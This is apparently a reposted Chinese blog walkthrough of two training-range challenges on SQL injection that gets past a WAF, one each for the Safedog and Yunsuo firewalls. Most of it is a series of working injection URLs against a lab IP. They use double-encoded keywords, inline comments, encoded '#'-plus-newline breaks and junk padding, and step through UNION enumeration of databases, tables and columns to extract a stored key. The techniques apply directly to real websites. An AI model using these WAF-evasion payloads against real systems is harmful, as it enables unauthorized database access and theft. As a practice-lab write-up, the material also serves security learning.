当前位置:主页 > 查看内容

SQL注入绕过WAF两道题目

发布时间:2021-05-21 00:00| 位朋友查看

简介:前言 WAF工作原理 在实际的渗透测试过程中经常会碰到网站存在WAF的情况。网站存在WAF意味着我们不能使用安全工具对网站进行测试因为一旦触碰了WAF的规则轻则丢弃报文重则拉黑IP。所以我们需要手动进行WAF的绕过而绕过WAF前肯定需要对WAF 的工作原理有一定的……

前言

WAF工作原理

在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解。

WAF绕过之SQL注入绕过安全狗

在这里插入图片描述
先随便输入一个双引号来显示报错闭合的语句

http://120.25.24.45:31832/?id=1"

在这里插入图片描述

http://120.25.24.45:31832/?id=1")--+

在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/%2561%256e%25641=2--+

这里解释一下%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:31832/?id=1")/*asifnjanf*/OrDEr%23%0aby/*asifnjanf*/3--+

这里来确定它的字段数为3列
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22) union%23%0a all select/*safaqwf*/1,database(%23%0a),group_concat(schema_name) /*asdnuqw*/from information_schema.schemata--+

这里有一个细节,就是id=后面的加上一个负号,就是不显示前面的结果
爆出所有数据库,我们要选择目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(table_name)%20/*asdnuqw*/from%20information_schema.tables where table_schema='dotaxueyuan'--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(column_name)%20/*asdnuqw*/from%20information_schema.columns where table_name='key'--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:31832/?id=-1%22)%20union%23%0a%20all%20select/*safaqwf*/1,database(%23%0a),group_concat(`key`)%20/*asdnuqw*/from%20dotaxueyuan.key--+

爆出key值
在这里插入图片描述

SQL注入绕过云锁

在这里插入图片描述
先随便输入一个单引号来显示报错闭合的语句

http://120.25.24.45:30550/?id=1'

在这里插入图片描述

http://120.25.24.45:30550/?id=1'--+

在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0a%2561%256e%25641=2--+

这里解释一下111111111111111111111这么一大串数字1就是运用SQL注入之垃圾数据绕过的原理,%2561%256e%2564这个就是and的url编码,可以去bp转一下
/**/ 这个就是SQL注入内联注释符,绕WAF有时候会用到的
%23%0a这个URL解码就是#号和换行,也可以说是一个绕过姿势

它的报错信息是Unknown column '6e' in 'where clause' 意思是不存在6个列字段
在这里插入图片描述

http://120.25.24.45:30550/?id=111111111111111111111'/*daewqqw*/%23%0aOrder%23%0a/*qweqwd*/by/*dasasdsaddac*/3--+

判断字段数,这个题的字段数为3,它这题如果你输入正确的语句是不会回显的
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),3--+

爆出目标数据库dotaxueyuan
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(table_name) from information_schema.tables where table_schema=%27dotaxueyuan%27--+

爆出表名,目标表名是key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(column_name) from information_schema.columns where table_name=%27key%27--+

爆出列名key
在这里插入图片描述

http://120.25.24.45:30550/?id=-111111111111111111111'/*daewqqw*/%23%0aUnion%23%0a/*qweqwd*/select/*dasasdsaddac*/1,database(),group_concat(`key`) from dotaxueyuan.key--+

爆出key值
在这里插入图片描述
靶场链接来自于东塔攻防世界靶场
https://labs.do-ta.com/index/course/index?one=15&two=17&three=51&level=-1&other=-1&title=

;原文链接:https://blog.csdn.net/weixin_47598409/article/details/115497825
本站部分内容转载于网络,版权归原作者所有,转载之目的在于传播更多优秀技术内容,如有侵权请联系QQ/微信:153890879删除,谢谢!

推荐图文


随机推荐